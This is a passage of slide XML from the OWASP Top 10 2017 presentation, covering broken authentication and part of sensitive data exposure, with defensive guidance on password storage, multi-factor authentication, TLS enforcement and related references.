          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1828800"/>
            <a:ext cx="6019800" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>OWASP Top 10 - 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>The Ten Most Critical Web Application Security Risks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1935032" y="8636913"/>
            <a:ext cx="4389568" cy="430887"/>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This work is licensed under a </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4572000"/>
            <a:ext cx="4876397" cy="3248899"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="8758980"/>
            <a:ext cx="1630232" cy="261610"/>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the use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>lists of known passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, is a common attack. If an application does not rate limit authentication attempts, the application can be used as a password oracle to determine if the credentials are valid.</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Insecure password storage (including plain text, reversibly encrypted passwords, and weakly hashed passwords (such as using MD5/SHA1 with or without a salt) can lead to breaches. A recent effort by a small group of researchers cracked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>320 million passwords in less than three weeks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, including long passwords. Instead use modern hashing algorithms such as Argon2, with salting and sufficient work factor to prevent the use of rainbow tables, word lists, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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Confirmation of the user's identity, authentication, and session management are critical for separating malicious unauthenticated attackers from authorized users.</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You may have authentication weaknesses if your application:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">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which is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brute force or other automated attacks.</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default, weak or well-known passwords, such as "Password1" or "admin/admin“.</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weak or ineffectual credential recovery and forgot password processes, such as "knowledge-based answers", which cannot be made safe.</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plain text, encrypted, or weakly hashed passwords permit the rapid recovery of passwords using GPU crackers or brute force tools.</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Has missing or ineffective multi-factor authentication.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pP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smtClean="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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP ASVS: V2 Authentication</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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>V3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>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Testing Guide: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Identity</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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Cheat Sheet: Credential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Cheat Sheet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Cheat Sheet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>Password Storage</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6"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Cheat Sheet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:hlinkClick r:id="rId16"/>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NIST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>800-63b: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>5.1.1 Memorized Secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> – for thorough, modern, evidence based advice on authentication. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>CWE-287: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>CWE-384: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>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Do not ship or deploy with any default credentials, particularly for admin users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hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>Store passwords using a modern one way hash function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, such as Argon2 or PBKDF2, with sufficient work factor to prevent realistic GPU cracking attacks.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Implement weak password checks, such as testing new or changed passwords against a list of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId22"/>
              </a:rPr>
              <a:t>top 10000 worst passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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Align password length, complexity and rotation policies with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>NIST 800-63 B's guidelines in section 5.1.1 for Memorized Secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or other modern, evidence based password policies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Ensure registration, credential recovery, and API pathways are hardened against account enumeration attacks by using the same messages for all outcomes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Where possible, implement multi-factor authentication to prevent credential stuffing, brute force, automated, and stolen credential attacks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Log authentication failures and alert administrators when credential stuffing, brute force, other attacks are detected.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="83276B"/>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1184513187"/>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xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="5580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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability</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kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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rgbClr val="FEFFFF"/>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r>
                        <a:rPr lang="en-US" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Attackers have access to hundreds of millions of valid username and password combinations for credential stuffing, default administrative account lists, automated brute force and dictionary attack tools, and advanced GPU cracking tools.</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The prevalence of broken authentication is widespread due to the design and implementation of most identity and access management systems.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Attackers can detect broken authentication using manual means, but are often attracted by password dumps</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, or after a social engineering attack such as phishing or similar. </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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Attackers only have to gain access to a few accounts, or just one admin  account to compromise the system. Depending on the domain of the application, this may allow money laundering social security fraud and identity theft; or disclose legally protected highly sensitive information.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">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site doesn't use or enforce TLS for all pages, or if it supports weak encryption. An attacker simply monitors network traffic, strips or intercepts the TLS (like an open wireless network), and steals the user's session cookie.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The attacker then replays this cookie and hijacks the user's (authenticated) session, accessing or modifying the user's private data. Instead of the above he could alter all transported data, e.g. the recipient of a money transfer.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The password database uses unsalted hashes to store everyone's passwords. A file upload flaw allows an attacker to retrieve the password database. All the unsalted hashes can be exposed with a rainbow table of pre-calculated hashes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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The first thing is to determine the protection needs of data in transit and at rest. For example, passwords, credit card numbers, health records, and personal information require extra protection, particularly if that data falls under the EU's General Data Protection Regulation (GDPR), local privacy laws or regulations, financial data protection regulations and laws, such as PCI Data Security Standard (PCI DSS), or health records laws, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Health Insurance Portability Act (HIPAA)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.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any data of a site transmitted in clear text, internally or externally? Internet traffic is especially </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dangerous,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but from load balancers to web servers or from web servers to back end systems can be problematic</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any old or weak cryptographic algorithms used either by default or in older code? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A6:2017-Security Misconfiguration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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default crypto keys in use, weak crypto keys generated or re-used, or is proper key management or rotation missing?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 encryption not enforced, e.g. are any user agent (browser) security directives or headers missing?</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see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>ASVS areas Crypto (V7), Data Prot (V9) and SSL/TLS (V10)</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5"/>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4"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (V7,9,10)</a:t>
            </a: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6"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Cheat Sheet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Transport Layer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
